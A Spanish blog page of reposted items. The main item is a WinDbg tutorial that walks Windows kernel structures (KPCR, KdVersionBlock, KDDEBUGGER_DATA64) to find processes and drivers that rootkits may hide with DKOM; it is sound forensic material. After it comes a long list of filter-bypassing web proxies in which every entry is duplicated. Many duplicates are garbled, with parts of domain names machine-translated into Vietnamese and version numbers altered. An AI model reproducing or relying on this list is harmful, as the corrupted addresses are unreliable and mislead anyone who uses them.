 http://www.mandiant.com/products/free_software/web_historian/

Fuente:
http://conexioninversa.blogspot.com/2010/08/web-historian.html

Agradecimientos a pedro sanchez por el articulo.

Usando la estructura KPCR en nuestro beneficio

0 comentarios
Articulo visto en el blog de neofito
-----------------------------------------------------------------------------------------------------------

En la búsqueda de procesos o drivers maliciosos ocultos cargados en memoria resultan de vital interés determinadas variables que contienen información relevante respecto al estado del kernel en el sistema en que Windows se está ejecutando. En este artículo y probablemente otro venidero descubriremos como acceder al contenido de estas variables, las estructuras que las contienen y algunas cosas más.

El "truco", inicialmente publicado por Edgar Barbosa en el paper "Finding some non-exported kernel variables in Windows XP", y posteriormente completado por Alex Ionescu en su artículo "Getting Kernel Variables from KdVersionBlock, Part 2" para rootkit.com se basa en el contenido de la estructura KPCR.

Esta estructura, ubicada en la dirección de memoria apuntada por el registro FS para sistemas x86 y el registro GS en sistemas x64, es utilizada por el kernel como almacén de información específica para cada procesador disponible en el sistema. En Windows XP/2003 siempre podremos encontrarla en la dirección 0xffdff000 pero en Windows Vista, y como consecuencia de la funcionalidad ASLR, esta dirección no es fija. Por último indicar, tal como aparece reflejado en la quinta edición de Windows Internals, que en sistemas IA64 la estructura KPCR siempre se ubicará en la dirección 0xe0000000ffff0000.

Vamos a analizar el contenido de la KPCR haciendo un poco de local kernel debugging con Windbg pero para poder continuar, y dado que lo único que tengo a mano es un Windows Vista, primero tendremos que preparar el sistema para ello.

Kernel Debugging en Windows Vista

Si abrimos WinDbg, menú File, Kernel Debug... y en el diálogo que aparece seleccionamos la pestaña Local y pulsamos Aceptar sólo obtendremos un mensaje de error indicando que será necesario arrancar el sistema en modo debug:


Como suelo trastear habitualmente con el proceso de local kernel debugging agregaré una entrada en el cargador de arranque de Windows Vista para no tener que activar dicha funcionalidad y reiniciar el sistema en cada ocasión. Los pasos:
  1. Copiamos la entrada configurada por defecto y le asignamos, por ejemplo, Debugentry como descripción. El número que aparece entre llaves se conoce como GUID y representa un identificador único asignado por Windows para la nueva entrada generada en el cargador de arranque.
    C:\Users\javi>bcdedit /copy {current} /d DebugEntry
    La entrada se copió correctamente en {2663707c-6f45-11df-8ecc-005056c00008}.
  2. Modificamos el orden de aparición de las entradas del cargador de arranque para establecer Debugentry como segunda opción:
    C:\Users\javi>bcdedit /displayorder {current} {2663707c-6f45-11df-8ecc-005056c00008}
    La operación se ha completado correctamente.
  3. Por último activamos la funcionalidad de debug para la segunda de las opciones mostradas durante el arranque:
    C:\Users\javi>bcdedit /debug {2663707c-6f45-11df-8ecc-005056c00008} on
    La operación se ha completado correctamente.

Una vez reiniciado el sistema ya podemos abrir una sesión de local kernel debug. Es importante resaltar que este tipo de debug no es el más adecuado ya que para hacer las cosas bién deberíamos utilizar dos sistemas, uno el que analiza y otro el analizado, o incluso una máquina virtual como sistema a analizar, pero para aprender un poco como funciona Windows internamente este tipo de debugging es más que aceptable.

Analizando la KPCR (Kernel Processor Control Region)

La extensión del depurador en modo kernel !pcr nos mostrará, por defecto, información del primer procesador o procesador 0. Si en un sistema con varios núcleos, ya sean físicos o lógicos, indicamos expresamente el número de procesador obtendremos información específica del mismo. Un ejemplo para la salida del comando en mi sistema:
lkd> !pcr
KPCR for Processor 0 at 81d40800:
    Major 1 Minor 1
 NtTib.ExceptionList: 8a513814
     NtTib.StackBase: 00000000
    NtTib.StackLimit: 00000000
  NtTib.SubSystemTib: 80151000
       NtTib.Version: 002a76c5
   NtTib.UserPointer: 00000001
       NtTib.SelfTib: 7ffde000
 
             SelfPcr: 81d40800
                Prcb: 81d40920
                Irql: 00000002
                 IRR: 00000000
                 IDR: ffffffff
       InterruptMode: 00000000
                 IDT: 81bff400
                 GDT: 81bff000
                 TSS: 80151000
 
       CurrentThread: 8469a218
          NextThread: 00000000
          IdleThread: 81d44640
 
           DpcQueue:

El resultado muestra un resumen de los valores asignados a cada uno de los campos de la estructura KPCR. De hecho, ahora que ya conocemos la dirección en memoria para la estructura correspondiente al primer procesador del sistema podremos consultar su contenido y formato con el comando:
lkd> dt nt!_KPCR 81d40800
   +0x000 NtTib            : _NT_TIB
   +0x000 Used_ExceptionList : 0x80e96a3c _EXCEPTION_REGISTRATION_RECORD
   +0x004 Used_StackBase   : (null) 
   +0x008 Spare2           : (null) 
   +0x00c TssCopy          : 0x80151000 Void
   +0x010 ContextSwitches  : 0x2b37f0
   +0x014 SetMemberCopy    : 1
   +0x018 Used_Self        : 0x7ffde000 Void
   +0x01c SelfPcr          : 0x81d40800 _KPCR
   +0x020 Prcb             : 0x81d40920 _KPRCB
   +0x024 Irql             : 0x2 ''
   +0x028 IRR              : 0
   +0x02c IrrActive        : 0
   +0x030 IDR              : 0xffffffff
   +0x034 KdVersionBlock   : 0x81d3fc70 Void
   +0x038 IDT              : 0x81bff400 _KIDTENTRY
   +0x03c GDT              : 0x81bff000 _KGDTENTRY
   +0x040 TSS              : 0x80151000 _KTSS
   +0x044 MajorVersion     : 1
   +0x046 MinorVersion     : 1
   +0x048 SetMember        : 1
   +0x04c StallScaleFactor : 0x7cb
   +0x050 SpareUnused      : 0 ''
   +0x051 Number           : 0 ''
   +0x052 Spare0           : 0 ''
   +0x053 SecondLevelCacheAssociativity : 0 ''
   +0x054 VdmAlert         : 0
   +0x058 KernelReserved   : [14] 0
   +0x090 SecondLevelCacheSize : 0
   +0x094 HalReserved      : [16] 0
   +0x0d4 InterruptMode    : 0
   +0x0d8 Spare1           : 0 ''
   +0x0dc KernelReserved2  : [17] 0
   +0x120 PrcbData         : _KPRCB

Para el propósito de este artículo resultan de interés concretamente dos campos de la estructura anterior: el primero de ellos, SelfPcr, se encuentra en el offset 0x01c y, como podemos observar, no es más que un puntero a la estructura en sí misma. El otro campo interesante sería KdVersionBlock, que se ubica en el offset 0x034 y también es un puntero. Lo curioso de este último campo es que en Windows 2000 aparecía definido como Reserved2 y su valor siempre era 0x0, es decir, era un campo reservado. Pero ahora, ¿a dónde apunta este campo?

DBGKD_GET_VERSION64 o lo que conlleva tirar del hilo

Vamos a obtener un volcado de la memoria utilizando el puntero contenido en el campo KdVersionBlock de la estructura KPCR y mostrando, por defecto, 32 DWORDS (128 bytes):
lkd> dd 81d3fc70
81d3fc70  1772000f 00030006 030c014c 0000002e
81d3fc80  81c48000 ffffffff 81d5fc70 ffffffff
81d3fc90  81f63fec ffffffff 81f63fec 81f63fec
81d3fca0  00000000 00000000 4742444b 00000330
81d3fcb0  81c48000 00000000 81cf3ab8 00000000
81d3fcc0  00000000 00000000 00080128 00010018
81d3fcd0  81cf5000 00000000 00000000 00000000
81d3fce0  81d5fc70 00000000 81d55990 00000000

Los primeros 10 DWORDS se corresponden con la estructura _DBGKD_GET_VERSION64, así que dejemos que WinDbg interprete el contenido de la memoria por nosotros:
lkd> dt nt!_DBGKD_GET_VERSION64 81d3fc70
   +0x000 MajorVersion     : 0xf
   +0x002 MinorVersion     : 0x1772
   +0x004 ProtocolVersion  : 0x6 ''
   +0x005 KdSecondaryVersion : 0 ''
   +0x006 Flags            : 3
   +0x008 MachineType      : 0x14c
   +0x00a MaxPacketType    : 0xc ''
   +0x00b MaxStateChange   : 0x3 ''
   +0x00c MaxManipulate    : 0x2e '.'
   +0x00d Simulation       : 0 ''
   +0x00e Unused           : [1] 0
   +0x010 KernBase         : 0xffffffff`81c48000
   +0x018 PsLoadedModuleList : 0xffffffff`81d5fc70
   +0x020 DebuggerDataList : 0xffffffff`81f63fec

También existe la estructura _DBGKD_GET_VERSION32, o sea, una versión de 32 bits, pero parece que ha sido deshechada en favor de la anterior. Podemos obtener el tipo y función para cada uno de los campos si analizamos el fichero de cabecera windbgexts.h que acompaña a las Debugging Tools de Microsoft y que localizaremos en:

C:\Program Files\Debugging Tools for Windows (x86)\sdk\inc

Una vez hecho el inciso volvamos al resultado anterior y centrémonos en uno de los campos: DebuggerDataList. Resulta que se trata de la cabecera de una lista doblemente enlazada cuya finalidad es contener punteros por si se definen nuevos "debug data blocks" para extensiones del depurador. Lo más importante es que esta lista siempre tendrá al menos un miembro, el cual será utilizado por el depurador para acceder a diferentes variables definidas por el kernel y que serán almacenadas en una estructura especial, _KDDEBUGGER_DATA64 (de nuevo la versión de 32 bits ha sido deshechada). Para empezar obtengamos la dirección donde encontraremos esta estructura:
lkd> dd 81f63fec
81f63fec  81d3fc98 81d3fc98 00000000 00000000
81f63ffc  00000000 00000000 00000000 00000000
81f6400c  00000000 00000000 00000000 00000000
81f6401c  00000000 00000000 00000000 00000000
81f6402c  00000000 00000000 00000000 00000000
81f6403c  00000000 00000000 00000000 00000000
81f6404c  00000000 00000000 00000000 00000000
81f6405c  00000000 00000000 00000000 00000000

Como en esta ocasión la estructura _KDDEBUGGER_DATA64 se encontrará, habitualmente, justo a continuación de la estructura _DBGKD_GET_VERSION64, pero dado que esto no es imprescindible es mejor asegurarnos con el procedimiento anterior; en este sentido también será muy revelador encontrar el valor hexadecimal 4742444b (KDBG en ASCII) en el offset 0x16. Una vez confirmado que la dirección de memoria es 81d3fc98 podemos seguir interpretando el resto del volcado, es decir:
81d3fc90                    81f63fec 81f63fec
81d3fca0  00000000 00000000 4742444b 00000330
81d3fcb0  81c48000 00000000 81cf3ab8 00000000
81d3fcc0  00000000 00000000 00080128 00010018
81d3fcd0  81cf5000 00000000 00000000 00000000
81d3fce0  81d5fc70 00000000 81d55990 00000000

Lamentablemente no podremos utilizar windbg directamente para que interprete los valores por nosotros:
lkd> dt nt!_KDDEBUGGER_DATA64 81d3fc98
Symbol nt!_KDDEBUGGER_DATA64 not found.

¿o tal vez si?

Programando extensiones para el depurador

A mi parecer, una de las funcionalidades más interesantes de las herramientas de depuración de Microsoft, aka las Debugging Tools, es la posibilidad de ampliar el número de comandos disponibles mediantes extensiones del depurador. Estas extensiones se implementan como librerías dll que una vez cargadas nos permitirán utilizar los comandos que exportan.

Dado que no soy programador y no quería eternizar la aparición de este mensaje me puse a buscar en internet y utilicé las siguientes fuentes como ayuda para mi objetivo: generar una extensión que me permita obtener semiautomáticamente toda la información volcada en este artículo de forma manual.

La primera de las fuentes proviene del siguiente thread, "Récup IDT, GDT , etc. sur systèmes MP". Allí podremos descargar y entender el funcionamiento de una extensión del depurador que nos permitirá volcar la estructura _KDDEBUGGER_DATA64, entre otras cosas.

La segunda de las fuentes, "Setup A Windbg Extension In VisualStudio 2008", contiene una plantilla para el compilador MS Visual Studio 2008 (una vez convertida servirá igualmente para la versión 2010 de este compilador) preparada para que únicamente tengamos que preocuparnos de implementar nuestros propios comandos, los cuales serán exportados por dll.

Reconocidas e incluidas las fuentes, para utilizar mi extensión bastará con descargarla, extraer la dll adecuada (está la versión compilada en XP y la versión compilada en Windows Vista) en el siguiente directorio:

C:\Program Files\Debugging Tools for Windows (x86)\winext

Ahora habrá que cargarla en el depurador y lanzar adecuadamente el comando exportado, pasándole como parámetro la direccion de la estructura KPCR, para obtener todo el contenido mostrado en este mensaje pero de forma "automágica":
lkd> .load AvidExt.dll
lkd> !mycmd 81d40800
 
Direccion de la estructura _KPCR: 81d40800
Puntero en _KPCR.KdVersionBlock : 81d3fc70
 
_DBGKD_GET_VERSION64 en 81d3fc70
   +0x000 MajorVersion        : 0xf
   +0x002 MinorVersion        : 0x1772
   +0x004 ProtocolVersion     : 0x6
   +0x005 KdSecondaryVersion  : 00
   +0x006 Flags               : 0x3
   +0x008 MachineType         : 0x14c
   +0x00a MaxPacketsType      : 0xc
   +0x00b MaxStateChange      : 0x3
   +0x00c MaxManipulate       : 0x2e
   +0x00d Simulation          : 00
   +0x00e Unused              : 00
   +0x010 KernBase           : 0xffffffff81c48000
   +0x018 PsLoadedModuleList : 0xffffffff81d5fc70
   +0x020 DebuggerDataList   : 0xffffffff81f63fec
 
_KDDEBUGGER_DATA64 en 81d3fc98
   +0x000 DBGKD_DEBUG_DATA_HEADER64 : _DBGKD_DEBUG_DATA_HEADER64
      +0x000 LIST_ENTRY64 : _LIST_ENTRY64
         +0x000 Flink   : 0x81f63fec
         +0x008 Blink   : 0x81f63fec
      +0x016 OwnerTag   : 0x4742444b
      +0x020 Size       : 0x000330
   +0x024 KernBase                 : 0xffffffff81c48000
   +0x032 BreakpointWithStatus     : 0xffffffff81cf3ab8
   +0x040 SavedContext             : 0
   +0x048 ThCallbackStack          : 0x128
   +0x050 NextCallback             : 0x8
   +0x052 FramePointer             : 0x18
   +0x054 PaeEnabled               : 0x1
   +0x056 KiCallUserMode           : 0xffffffff81cf5000
   +0x064 KeUserCallbackDispatcher : 0
   +0x072 PsLoadedModuleList       : 0xffffffff81d5fc70
   +0x080 PsActiveProcessHead      : 0xffffffff81d55990
   +0x088 PspCidTable              : 0xffffffff81d559b4
   Continua...

No aparecen todos los campos de la estructura _KDDEBUGGER_DATA64 (son muchos) pero servirá para hacernos una idea y de paso aprender algo más sobre las herramientas de depuración de Windows. No obstante, y dado que he incluido el código fuente, siempre puede modificarse para mostrarla en su totalidad.

Utilizando el campo PsActiveProcessHead de la estructura anterior podemos listar los procesos en ejecución. Importante resaltar que dado que estamos utilizando la lista doblemente enlazada el resultado puede haber sido alterado si se ha utilizado DKOM para ocultar algún proceso malicioso:
lkd> dt _EPROCESS -l ActiveProcessLinks.Flink -y ImageFileName 81d5599-0xa0

o también la lista de drivers de dispositivos cargados en memoria mediante el campo PsLoadedModuleList:
lkd> dt _LDR_DATA_TABLE_ENTRY -l InLoadOrderLinks.Flink -y FullDllName 81d5fc70-0x0

Por supuesto el resultado obtenido mediante el comando anterior tambien es susceptible al uso de DKOM.

Referencias

Microsoft Windows Internals, Fifth Edition
David Solomon, Mark Russinovich y Alex Ionescu

Finding some non-exported kernel variables in Windows XP

Getting Kernel Variables from KdVersionBlock, Part 2

Finding Kernel Global Variables in Windows

Récup IDT, GDT , etc. sur systèmes MP

Kernel Debugging in Windows Vista

Advanced Windows Kernel Debugging with VMWare and IDA's GDB debugger

Debugger Engine and Extension APIs
C:\Program Files\Debugging Tools for Windows (x86)\debugger.chm

Setup A Windbg Extension In VisualStudio 2008

Debug Tutorial Part 4: Writing WINDBG Extensions

Inside Out WinDbg Extensions

Easy list traversing (dt vs. !list)


Fuente:
http://neosysforensics.blogspot.com/2010/08/usando-la-estructura-kpcr-en-nuestro.html

1053 web proxys

0 comentarios
Este articulo lo encontre via tue abajo dejo el link para que lo visiten.

---------------------------------------------------------------------------------------

* proxeasy.com (US, ASP.NET) proxeasy.com (US, ASP.NET)
* netevader.com (US, Glype) netevader.com (US, Glype)
* zerolike.com (US, Glype) zerolike.com (US, Glype)
* proxyboxonline.com (US, Glype) proxyboxonline.com (US, Glype)
* creditcardsproxy.com (US, Glype) creditcardsproxy.com (US, Glype)
* proxify.com (US, CGIProxy, SSL) proxify.com (US, CGIProxy, SSL)
* kfkt.info (US, Glype) kfkt.info (US, Glype)
* findfree.info (US, Glype, SSL) findfree.info (US, Glype, SSL)
* sneakme.net (US, Glype) sneakme.net (US, Glype)
* wantfun.info (US, Glype, SSL) wantfun.info (US, Glype, SSL)
* sneakyaccess.info (US, Glype) sneakyaccess.info (US, Glype)
* gojira.info (US, PHProxy 0.5) gojira.info (US, PHProxy 0,5)
* beyondblox74.info (US, Glype) beyondblox74.info (US, Glype)
* secretninjaproxy.info (US, PHProxy 0.5) secretninjaproxy.info (US, PHProxy 0,5)
* lawyerproxies.com (US, Glype) lawyerproxies.com (US, Glype)
* satexamstudy.com (US, CGIProxy) satexamstudy.com (US, CGIProxy)
* hnq.in (US, PHProxy 0.5) hnq.in (US, PHProxy 0,5)
* proxybay.cn (US, Glype) proxybay.cn (US, Glype)
* virtual-browser.com (US, CGIProxy, SSL) ảo-browser.com (US, CGIProxy, SSL)
* surfstreet.info (US, Glype) surfstreet.info (US, Glype)
* itsblocked.com (US, PHProxy 0.5) itsblocked.com (US, PHProxy 0,5)
* browsejob.info (US, PHProxy 0.5) browsejob.info (US, PHProxy 0,5)
* eatblocks.com (US, Glype) eatblocks.com (US, Glype)
* ipraider.com (US, Glype) ipraider.com (US, Glype)
* ophy.info (US, Glype) ophy.info (US, Glype)
* xamal.com (US, PHProxy 0.5) xamal.com (US, PHProxy 0,5)
* creditcardproxies.com (US, Glype) creditcardproxies.com (US, Glype)
* oxybypass.info (US, PHProxy 0.5) oxybypass.info (US, PHProxy 0,5)
* hideplay.info (US, Unknown) hideplay.info (US, chưa biết)
* freeproxynet.com (US, Glype) freeproxynet.com (US, Glype)
* surfaceprograms.com (GB, PHProxy 0.5) surfaceprograms.com (GB, PHProxy 0,5)
* advocatelive.info (US, Glype) advocatelive.info (US, Glype)
* ultraunblock.com (US, CGIProxy) ultraunblock.com (US, CGIProxy)
* fizg.info (US, Glype) fizg.info (US, Glype)
* privacysurfing.info (US, Glype) privacysurfing.info (US, Glype)
* gethide.com (US, PHProxy 0.5) gethide.com (US, PHProxy 0,5)
* freeblox21.info (US, Glype) freeblox21.info (US, Glype)
* mamanee.com (US, Glype) mamanee.com (US, Glype)
* clearthru.info (US, Glype) clearthru.info (US, Glype)
* epods.info (NL, Glype) epods.info (NL, Glype)
* sslprxe.com (US, PHProxy 0.5, SSL) sslprxe.com (US, PHProxy 0,5, SSL)
* pwoxyblue.info (US, PHProxy 0.5) pwoxyblue.info (US, PHProxy 0,5)
* repub.info (US, Glype) repub.info (US, Glype)
* demonoidproxy.ca (US, PHProxy 0.5) demonoidproxy.ca (US, PHProxy 0,5)
* flashproxylist.com (US, Unknown) flashproxylist.com (US, chưa biết)
* 6end.info (US, Glype) 6end.info (US, Glype)
* 0me.info (US, Glype) 0me.info (US, Glype)
* freebeliever.info (US, Glype) freebeliever.info (US, Glype)
* hidingelephant.info (US, Glype) hidingelephant.info (US, Glype)
* mythesaurus.org (US, Glype) mythesaurus.org (US, Glype)
* scarletway.info (US, Glype) scarletway.info (US, Glype)
* site-unlock.info (US, PHProxy 0.5) trang web unlock.info (US, PHProxy 0,5)
* letlast.info (US, Glype) letlast.info (US, Glype)
* cunn.info (US, Glype) cunn.info (US, Glype)
* fertilebeautiful.cn (US, Glype) fertilebeautiful.cn (US, Glype)
* aniscartujo.com (US, Unknown) aniscartujo.com (US, chưa biết)
* ninjafilm.info (US, Glype) ninjafilm.info (US, Glype)
* oldschoolers.info (US, Glype) oldschoolers.info (US, Glype)
* myzzz.info (US, Glype) myzzz.info (US, Glype)
* browser.grik.net (US, Unknown) browser.grik.net (US, chưa biết)
* freeit39.info (US, Glype) freeit39.info (US, Glype)
* hidemenow.ws (US, Glype) hidemenow.ws (US, Glype)
* filterzap.info (US, Glype) filterzap.info (US, Glype)
* no88.info (US, Glype) no88.info (US, Glype)
* avoidfirewall.info (US, PHProxy 0.5) avoidfirewall.info (US, PHProxy 0,5)
* plyed.com (US, PHProxy 0.5) plyed.com (US, PHProxy 0,5)
* invisiblenet.info (US, PHProxy 0.5) invisiblenet.info (US, PHProxy 0,5)
* 16gb.info (CA, Glype) 16gb.info (CA, Glype)
* proxificate.net (CA, Zelune) proxificate.net (CA, Zelune)
* zooch.info (US, Glype) zooch.info (US, Glype)
* 1sys.info (US, Unknown) 1sys.info (US, chưa biết)
* shru.info (US, Glype) shru.info (US, Glype)
* yoursubstitute4u.info (US, Glype) yoursubstitute4u.info (US, Glype)
* freeit46.info (US, Glype) freeit46.info (US, Glype)
* ewebn.com (US, Glype) ewebn.com (US, Glype)
* legal-stuff.info (US, Glype) pháp lý-stuff.info (US, Glype)
* internetunblocked.info (US, PHProxy 0.5) internetunblocked.info (US, PHProxy 0,5)
* surf43.biz (DE, PHProxy 0.5) surf43.biz (DE, PHProxy 0,5)
* simran50.info (US, Glype) simran50.info (US, Glype)
* bloggingknowhow.info (US, PHProxy 0.5) bloggingknowhow.info (US, PHProxy 0,5)
* tindorafarms.com (US, PHProxy 0.5) tindorafarms.com (US, PHProxy 0,5)
* tembusan.com (NL, Glype) tembusan.com (NL, Glype)
* mrunblock.com (US, Glype) mrunblock.com (US, Glype)
* conscioushanging.cn (US, Glype) conscioushanging.cn (US, Glype)
* cuty.org (US, PHProxy 0.5) cuty.org (US, PHProxy 0,5)
* secure-tunnel.com (US, Glype, SSL) an toàn-tunnel.com (US, Glype, SSL)
* urban-warfare.net (US, PHProxy 0.5) đô thị-warfare.net (US, PHProxy 0,5)
* lazyfoo.info (GB, Glype) lazyfoo.info (GB, Glype)
* pwoxygreen.info (US, PHProxy 0.5) pwoxygreen.info (US, PHProxy 0,5)
* superstealthy.com (US, Glype) superstealthy.com (US, Glype)
* monthlyinitiative.info (US, Glype) monthlyinitiative.info (US, Glype)
* surf-me.info (US, PHProxy 0.5) lướt-me.info (US, PHProxy 0,5)
* websurfpro.info (US, PHProxy 0.5) websurfpro.info (US, PHProxy 0,5)
* auxo.info (US, Glype) auxo.info (US, Glype)
* qfly.info (US, Glype) qfly.info (US, Glype)
* sideshowmel.info (US, CGIProxy) sideshowmel.info (US, CGIProxy)
* skrewskool.info (US, Glype) skrewskool.info (US, Glype)
* chemicaltrue.cn (US, Glype) chemicaltrue.cn (US, Glype)
* freeblox30.info (US, Glype) freeblox30.info (US, Glype)
* webrelease.info (US, PHProxy 0.5) webrelease.info (US, PHProxy 0,5)
* falconpunch.info (US, PHProxy 0.5) falconpunch.info (US, PHProxy 0,5)
* hide7.info (US, Glype) hide7.info (US, Glype)
* freeblox20.info (US, Glype) freeblox20.info (US, Glype)
* admindeals.com (US, Glype) admindeals.com (US, Glype)
* dontviewme.info (US, PHProxy 0.5) dontviewme.info (US, PHProxy 0,5)
* justclik.info (US, PHProxy 0.5) justclik.info (US, PHProxy 0,5)
* narrowwaiting.cn (US, Glype) narrowwaiting.cn (US, Glype)
* apchemistry.info (US, CGIProxy) apchemistry.info (US, CGIProxy)
* thegob.info (US, Glype) thegob.info (US, Glype)
* unbeatable.co.in (US, Glype) unbeatable.co.in (US, Glype)
* linklot.cn (US, Glype) linklot.cn (US, Glype)
* breezers.info (US, PHProxy 0.5) breezers.info (US, PHProxy 0,5)
* blitzproxy.com (US, PHProxy 0.5) blitzproxy.com (US, PHProxy 0,5)
* ofacebook.info (US, Glype) ofacebook.info (US, Glype)
* h5w.info (US, Glype) h5w.info (US, Glype)
* 0256.info (US, Misc PHP) 0256.info (US, Misc PHP)
* webvisa.info (US, Glype) webvisa.info (US, Glype)
* proxd.info (US, Glype) proxd.info (US, Glype)
* worldwideproxy.com (US, PHProxy 0.4) worldwideproxy.com (US, PHProxy 0,4)
* roundpast.cn (US, Glype) roundpast.cn (US, Glype)
* freeblox46.info (US, Glype) freeblox46.info (US, Glype)
* surfcast.info (US, PHProxy 0.5) surfcast.info (US, PHProxy 0,5)
* wmzv.com (US, Glype) wmzv.com (US, Glype)
* unblockf.info (US, PHProxy 0.4) unblockf.info (US, PHProxy 0,4)
* jigwam.info (US, Glype) jigwam.info (US, Glype)
* unblockingsite.info (US, Glype) unblockingsite.info (US, Glype)
* openbrowsing.com (US, cURLProxy) openbrowsing.com (US, cURLProxy)
* digitaldoor.info (US, PHProxy 0.5) digitaldoor.info (US, PHProxy 0,5)
* conscioustrue.cn (US, Glype) conscioustrue.cn (US, Glype)
* proxysalt.com (GB, PHProxy 0.5) proxysalt.com (GB, PHProxy 0,5)
* myproproxy.info (US, PHProxy 0.5) myproproxy.info (US, PHProxy 0,5)
* mystudent-loan.info (US, Glype) mystudent-loan.info (US, Glype)
* bypass.bz (US, Zelune) bypass.bz (US, Zelune)
* wmhl.info (US, Glype) wmhl.info (US, Glype)
* ipodrepairer.com (US, CGIProxy) ipodrepairer.com (US, CGIProxy)
* goofabout.info (US, Glype) goofabout.info (US, Glype)
* webtoast.com.cn (US, PHProxy 0.5) webtoast.com.cn (US, PHProxy 0,5)
* freeit28.info (US, Glype) freeit28.info (US, Glype)
* heypeep.com (US, PHProxy 0.5) heypeep.com (US, PHProxy 0,5)
* free-bro.info (US, PHProxy 0.5) miễn phí-bro.info (US, PHProxy 0,5)
* lindenwealth.com (US, CGIProxy) lindenwealth.com (US, CGIProxy)
* calam.info (US, Glype) calam.info (US, Glype)
* fly4.info (US, Glype) fly4.info (US, Glype)
* streamone.info (US, Glype) streamone.info (US, Glype)
* 11fm.info (US, Glype) 11fm.info (US, Glype)
* ninjafinance.info (US, Glype) ninjafinance.info (US, Glype)
* unblockwhat.info (US, PHProxy 0.5) unblockwhat.info (US, PHProxy 0,5)
* abeo.info (NL, Glype) abeo.info (NL, Glype)
* studyunblockers.info (US, PHProxy 0.5) studyunblockers.info (US, PHProxy 0,5)
* evilgorilla.com (US, CGIProxy) evilgorilla.com (US, CGIProxy)
* mathquiz.cn (US, PHProxy 0.5) mathquiz.cn (US, PHProxy 0,5)
* ninjaproxie.info (US, PHProxy 0.5) ninjaproxie.info (US, PHProxy 0,5)
* zcha.com (US, PHProxy 0.5) zcha.com (US, PHProxy 0,5)
* takeactions.info (US, PHProxy 0.5) takeactions.info (US, PHProxy 0,5)
* ubface.info (DE, Glype) ubface.info (DE, Glype)
* proxatron.com (US, Glype) proxatron.com (US, Glype)
* free2click.info (US, PHProxy 0.5) free2click.info (US, PHProxy 0,5)
* maskmytracks.com (US, PHProxy 0.5) maskmytracks.com (US, PHProxy 0,5)
* lurkaway.com (US, PHProxy 0.5) lurkaway.com (US, PHProxy 0,5)
* evantbyrne.info (US, Glype) evantbyrne.info (US, Glype)
* hotunblock.com (US, Glype) hotunblock.com (US, Glype)
* bloxgo11.info (US, Glype) bloxgo11.info (US, Glype)
* gursimran4.info (US, PHProxy 0.5) gursimran4.info (US, PHProxy 0,5)
* inwith.info (US, Glype) inwith.info (US, Glype)
* ochreway.info (US, Glype) ochreway.info (US, Glype)
* freetimesurf.info (US, PHProxy 0.5) freetimesurf.info (US, PHProxy 0,5)
* ironess.info (US, Glype) ironess.info (US, Glype)
* webproxyarchive.info (US, CGIProxy) webproxyarchive.info (US, CGIProxy)
* persimmonway.info (US, Glype) persimmonway.info (US, Glype)
* 64p.info (US, PHProxy 0.5) 64p.info (US, PHProxy 0,5)
* pandasurf.info (US, Glype) pandasurf.info (US, Glype)
* proxyboost.net (US, PHProxy 0.5) proxyboost.net (US, PHProxy 0,5)
* k9bible.com (GB, PHProxy 0.5) k9bible.com (GB, PHProxy 0,5)
* word5.info (US, Glype) word5.info (US, Glype)
* brownmask.info (US, PHProxy 0.5) brownmask.info (US, PHProxy 0,5)
* puceway.info (US, Glype) puceway.info (US, Glype)
* letpart.info (US, Glype) letpart.info (US, Glype)
* nomorehiddens.info (US, PHProxy 0.5) nomorehiddens.info (US, PHProxy 0,5)
* ecruway.info (US, Glype) ecruway.info (US, Glype)
* ykh.in (US, PHProxy 0.5) ykh.in (US, PHProxy 0,5)
* webxplorer.info (US, Glype) webxplorer.info (US, Glype)
* sneakwiki.com (US, PHProxy 0.5) sneakwiki.com (US, PHProxy 0,5)
* xteb.us (US, Glype) xteb.us (US, Glype)
* zzznow.info (US, Glype) zzznow.info (US, Glype)
* lusaka.ws (US, PHProxy 0.5) lusaka.ws (US, PHProxy 0,5)
* anonymous-free-web-proxy.com (US, PHProxy 0.5) danh-free-web-proxy.com (US, PHProxy 0,5)
* 4sheep.info (US, Glype) 4sheep.info (US, Glype)
* euro-ip.info (DE, Glype) euro-ip.info (DE, Glype)
* 9fish.info (US, Glype) 9fish.info (US, Glype)
* hostph.com (US, PHProxy 0.5) hostph.com (US, PHProxy 0,5)
* fly8.info (US, Glype) fly8.info (US, Glype)
* funtosurf.com (US, PHProxy 0.5) funtosurf.com (US, PHProxy 0,5)
* jailbreaked.net (NL, Glype) jailbreaked.net (NL, Glype)
* uuvu.info (US, PHProxy 0.5) uuvu.info (US, PHProxy 0,5)
* freedancenow.info (GB, PHProxy 0.5) freedancenow.info (GB, PHProxy 0,5)
* unblockyoutube.ws (US, CGIProxy) unblockyoutube.ws (US, CGIProxy)
* bfree6.info (US, Glype) bfree6.info (US, Glype)
* 6cow.info (US, Glype) 6cow.info (US, Glype)
* casualproxy.info (NL, Glype) casualproxy.info (NL, Glype)
* ddsurf.co.uk (GB, PHProxy 0.5) ddsurf.co.uk (GB, PHProxy 0,5)
* instantproxlive.info (US, Glype) instantproxlive.info (US, Glype)
* ianon.info (US, PHProxy 0.5) ianon.info (US, PHProxy 0,5)
* widequiet.cn (US, Glype) widequiet.cn (US, Glype)
* ixot.info (US, Glype) ixot.info (US, Glype)
* opss.info (NL, Glype) opss.info (NL, Glype)
* akdis.cn (US, PHProxy 0.5) akdis.cn (US, PHProxy 0,5)
* al0.info (US, Glype) al0.info (US, Glype)
* ittv.info (NL, Glype) ittv.info (NL, Glype)
* surferprivacy.info (US, Glype) surferprivacy.info (US, Glype)
* 007surfing.com (US, PHProxy 0.5) 007surfing.com (US, PHProxy 0,5)
* sneaky9.com (US, PHProxy 0.5) sneaky9.com (US, PHProxy 0,5)
* brightready.cn (US, Glype) brightready.cn (US, Glype)
* surfpod.net (US, PHProxy 0.5) surfpod.net (US, PHProxy 0,5)
* 8mi.info (US, Glype) 8mi.info (US, Glype)
* bestlog.info (US, Glype) bestlog.info (US, Glype)
* freer.info (US, Glype) freer.info (US, Glype)
* easywall.info (US, Glype) easywall.info (US, Glype)
* purepass.info (US, PHProxy 0.5) purepass.info (US, PHProxy 0,5)
* a9v.info (US, Glype) a9v.info (US, Glype)
* beyondblox68.info (US, Glype) beyondblox68.info (US, Glype)
* bypass5.info (PHProxy 0.5) bypass5.info (PHProxy 0,5)
* funni.info (US, Glype) funni.info (US, Glype)
* digglet.info (US, PHProxy 0.5) digglet.info (US, PHProxy 0,5)
* nameview.info (GB, PHProxy 0.5) nameview.info (GB, PHProxy 0,5)
* lqs.in (US, PHProxy 0.5) lqs.in (US, PHProxy 0,5)
* ylk.in (US, PHProxy 0.5) ylk.in (US, PHProxy 0,5)
